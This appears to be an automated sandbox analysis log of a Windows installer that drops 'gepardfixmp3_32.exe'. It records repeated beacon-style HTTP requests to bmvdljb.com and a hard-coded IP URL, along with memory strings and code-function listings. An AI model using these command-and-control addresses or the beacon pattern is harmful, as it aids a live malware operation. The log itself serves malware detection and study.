        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396f8ffc13c3e99c HTTP/1.1Host: bmvdljb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
        Source: global trafficDNS traffic detected: DNS query: bmvdljb.com
        Source: gepardfixmp3_32.exe, 00000003.00000002.3385202089.0000000000A9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/
        Source: gepardfixmp3_32.exe, 00000003.00000002.3385202089.0000000000A83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12e
        Source: gepardfixmp3_32.exe, 00000003.00000002.3385202089.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, gepardfixmp3_32.exe, 00000003.00000002.3387962842.000000000363E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82d
        Source: eCh9R4T214.exe, 00000000.00000003.2135215031.0000000002320000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.exe, 00000000.00000002.3385206007.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000002.3385807866.0000000002180000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2140409485.0000000000692000.00000004.00000020.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2140531016.0000000000692000.00000004.00000020.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2137750932.0000000002190000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2140249239.0000000000692000.00000004.00000020.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2138611948.0000000002188000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2137017763.0000000003110000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000002.3385225642.0000000000692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fsf.org/
        Source: is-2DTNR.tmp.1.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
        Source: is-F27BV.tmp.1.drString found in binary or memory: http://tukaani.org/
        Source: is-F27BV.tmp.1.drString found in binary or memory: http://tukaani.org/xz/
        Source: eCh9R4T214.exe, 00000000.00000003.2135215031.0000000002320000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.exe, 00000000.00000002.3385206007.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000002.3385807866.0000000002180000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2140409485.0000000000692000.00000004.00000020.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2140531016.0000000000692000.00000004.00000020.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2137750932.0000000002190000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2140249239.0000000000692000.00000004.00000020.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2138611948.0000000002188000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000003.2137017763.0000000003110000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000002.3385225642.0000000000692000.00000004.00000020.00020000.00000000.sdmp, is-1P9P2.tmp.1.drString found in binary or memory: http://www.gnu.org/licenses/
        Source: eCh9R4T214.tmp, eCh9R4T214.tmp, 00000001.00000000.2136106475.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-R93BU.tmp.1.dr, eCh9R4T214.tmp.0.drString found in binary or memory: http://www.innosetup.com/
        Source: eCh9R4T214.exe, 00000000.00000003.2135596677.0000000002320000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.exe, 00000000.00000003.2135731235.00000000020C4000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, eCh9R4T214.tmp, 00000001.00000000.2136106475.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-R93BU.tmp.1.dr, eCh9R4T214.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
        Source: eCh9R4T214.exe, 00000000.00000003.2135596677.0000000002320000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.exe, 00000000.00000003.2135731235.00000000020C4000.00000004.00001000.00020000.00000000.sdmp, eCh9R4T214.tmp, 00000001.00000000.2136106475.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-R93BU.tmp.1.dr, eCh9R4T214.tmp.0.drString found in binary or memory: http://www.remobjects.com/psU

        System Summary

        barindex
        Source: gepardfixmp3_32.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: Epic Project Studio 10.4.46.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0042F530 NtdllDefWindowProc_A,1_2_0042F530
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00423B94 NtdllDefWindowProc_A,1_2_00423B94
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004125E8 NtdllDefWindowProc_A,1_2_004125E8
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004789DC NtdllDefWindowProc_A,1_2_004789DC
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004573CC PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_004573CC
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E944
        Source: C:\Users\user\Desktop\eCh9R4T214.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555D0
        Source: C:\Users\user\Desktop\eCh9R4T214.exeCode function: 0_2_0040840C0_2_0040840C
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004804C61_2_004804C6
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004709501_2_00470950
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004352D81_2_004352D8
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004677101_2_00467710
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0043036C1_2_0043036C
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004444D81_2_004444D8
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004345D41_2_004345D4
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004866041_2_00486604
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00444A801_2_00444A80
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00430EF81_2_00430EF8
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004451781_2_00445178
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0045F4301_2_0045F430
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0045B4D81_2_0045B4D8
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004875641_2_00487564
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004455841_2_00445584
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004697701_2_00469770
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0048D8C41_2_0048D8C4
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004519A81_2_004519A8
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0043DD601_2_0043DD60
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_00406C473_2_00406C47
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_004010513_2_00401051
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_00401C263_2_00401C26
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C5E7B43_2_02C5E7B4
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C5B4E53_2_02C5B4E5
